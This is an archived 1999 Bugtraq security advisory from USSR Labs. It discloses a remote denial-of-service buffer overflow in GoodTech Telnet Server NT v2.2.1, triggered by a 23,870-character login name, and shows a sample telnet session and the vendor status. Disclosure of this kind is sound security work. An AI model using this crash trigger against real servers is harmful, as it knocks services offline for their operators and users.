|
Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability
Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Date: Пн, 06 дек 1999 09:18:18
От: Ussr Labs <labs@USSRBACK.COM>
Кому: BUGTRAQ@SECURITYFOCUS.COM
Тема: Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability
--------------------------------------------------------------------------------
Remote DoS Attack in GoodTech Telnet Server NT v2.2.1 Vulnerability
PROBLEM
UssrLabs found a Remote DoS Attack in GoodTech Telnet Server NT v2.2.1,
the buffer overflow is caused by a long user name 23870 characters.
There is not much to expand on.... just a simple hole
Example:
[gimmemore@itsme]$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.
Welcome to GoodTech Telnet Server for Windows NT (V2.2) (Evaluation Copy)
(C) Copyright 1996-1999 GoodTech Systems, Inc.
Login username: (buffer)
Overflow Crashh.
Where (buffer) is 23870 characters.
Vendor Status:
Contacted.
Vendor Url: http://www.goodtechsys.com/
Program Url: http://www.goodtechsys.com/products.htm
Credit: USSRLABS
SOLUTION
Nothing yet.
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
http://www.ussrback.com
|
